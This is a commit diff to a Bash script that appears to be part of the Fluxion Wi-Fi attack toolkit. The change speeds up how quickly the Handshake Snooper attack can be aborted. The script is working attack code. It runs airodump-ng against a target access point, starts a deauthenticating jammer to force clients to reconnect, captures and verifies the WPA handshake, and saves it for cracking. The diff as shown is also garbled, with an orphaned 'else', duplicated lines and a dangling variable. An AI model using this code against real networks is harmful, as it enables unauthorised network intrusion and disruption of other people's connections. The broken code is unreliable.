Improved Handshake Snooper abort response time.

The Handshake Snooper arbiter could abort after waking from interval sleep. Flags sent to the script while waiting were enqueued, and triggered later. The snooper & jammer stayed up while the arbiter slept even after aborting. Users though they had to manually close the snooper and jammer. The problem was more apparent the longer the sleep interval chosen was.
2017-12-25 19:13:03 -06:00 · 2017-12-25 19:13:03 -06:00 · a6732771f8
parent 2250847122
commit a6732771f8
1 changed files with 28 additions and 47 deletions
--- a/Snooper/attack.sh
+++ b/Snooper/attack.sh
@ -15,12 +15,15 @@ function handshake_snooper_arbiter_daemon() {
 	function handshake_snooper_arbiter_daemon_abort() {
 		handshake_snooper_arbiter_daemon_state="aborted"
-		if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then
+		if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]
-			kill $handshake_snooper_arbiter_daemon_viewerPID
+			then kill $handshake_snooper_arbiter_daemon_viewerPID
 		fi
 		handshake_snooper_stop_deauthenticator
 		handshake_snooper_stop_captor
 		echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
 		exit 2
 	}
 	trap handshake_snooper_arbiter_daemon_abort SIGABRT
@ -28,12 +31,15 @@ function handshake_snooper_arbiter_daemon() {
 	source lib/HashUtils.sh
 	source lib/ColorUtils.sh
-	echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" > $FLUXIONWorkspacePath/handshake_snooper.log
+	# Cleanup files we've previously created to avoid conflicts.
 	sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"
 	# Display some feedback to the user to assure verifier is working.
-	xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f $FLUXIONWorkspacePath/handshake_snooper.log" &
+	xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" &
 	local handshake_snooper_arbiter_daemon_viewerPID=$!
 	echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" > "$FLUXIONWorkspacePath/handshake_snooper.log"
 	handshake_snooper_start_captor
 	handshake_snooper_start_deauthenticator
@ -41,15 +47,12 @@ function handshake_snooper_arbiter_daemon() {
 	# Keep snooping and verifying until we've got a valid hash from the capture file.
 	while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do
-		echo -e "[$(env -i date '+%H:%M:%S')] `io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice`" >> $FLUXIONWorkspacePath/handshake_snooper.log
+		echo -e "[$(env -i date '+%H:%M:%S')] `io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice`" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
-		sleep $HANDSHAKEVerifierInterval;
+		sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting.
 		# Check for abort after every blocking operation.
 		if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
 		# If synchronously searching, stop the captor and deauthenticator before checking.
 		if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then
-			echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >> $FLUXIONWorkspacePath/handshake_snooper.log
+			echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
 			handshake_snooper_stop_deauthenticator
 			handshake_snooper_stop_captor
 			mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap"
@ -57,63 +60,40 @@ function handshake_snooper_arbiter_daemon() {
 			pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> $FLUXIONOutputDevice
 		fi
-		# Check for abort after every blocking operation.
+		echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
 		if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
 		echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >> $FLUXIONWorkspacePath/handshake_snooper.log
 		hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC"
 		handshake_snooper_arbiter_daemon_verified=$?
 		# Check for abort after every blocking operation.
 		if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
 		# If synchronously searching, restart the captor and deauthenticator after checking.
 		if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then
 			sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*"
 			handshake_snooper_start_captor
 			handshake_snooper_start_deauthenticator
 			# Check for abort after every blocking operation.
 			if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
 		fi
 	done
-	# Stop captor and deauthenticator if we were searching asynchronously.
+	# Assure all processes are stopped before proceeding.
 	if [ "$HANDSHAKEVerifierSynchronicity" = "non-blocking" ]; then
 	handshake_snooper_stop_deauthenticator
 	handshake_snooper_stop_captor
 	fi
-	# If handshake didn't pass verification, it was aborted.
+	local completionTime=$(env -i date '+%H:%M:%S')
-	if [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then
+	echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
-		echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >> $FLUXIONWorkspacePath/handshake_snooper.log
+    echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> "$FLUXIONWorkspacePath/handshake_snooper.log"
 		return 1
 	else
 		echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterSuccededNotice" >> $FLUXIONWorkspacePath/handshake_snooper.log
 	fi
    echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterCompletedTip" >> $FLUXIONWorkspacePath/handshake_snooper.log
 	# Assure we've got a directory to store hashes into.
-	local handshake_snooper_arbiter_daemon_hashDirectory="$FLUXIONPath/attacks/Handshake Snooper/handshakes/"
+	mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/"
 	if [ ! -d "$handshake_snooper_arbiter_daemon_hashDirectory" ]; then
 		mkdir -p "$handshake_snooper_arbiter_daemon_hashDirectory"
 	fi
 	# Move handshake to storage if one was acquired.
 	mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap"
 	# Cleanup files we've created to leave it in original state.
 	sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"
 	# Signal parent process the verification terminated.
 	kill -s SIGABRT $1
 }
 function handshake_snooper_stop_captor() {
-	if [ "$HANDSHAKECaptorPID" ]; then
+	if [ "$HANDSHAKECaptorPID" ]
-		kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
+		then kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
 	fi
 	HANDSHAKECaptorPID=""
@ -129,14 +109,15 @@ function handshake_snooper_start_captor() {
 	    airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor &
    local parentPID=$!
-    while [ ! "$HANDSHAKECaptorPID" ]
+    while [ ! "$HANDSHAKECaptorPID" ]; do
-        do sleep 1; HANDSHAKECaptorPID=$(pgrep -P $parentPID)
+		sleep 1 & wait $!
 		HANDSHAKECaptorPID=$(pgrep -P $parentPID)
    done
 }
 function handshake_snooper_stop_deauthenticator() {
-	if [ "$HANDSHAKEDeauthenticatorPID" ]; then
+	if [ "$HANDSHAKEDeauthenticatorPID" ]
-		kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
+		then kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
 	fi
 	HANDSHAKEDeauthenticatorPID=""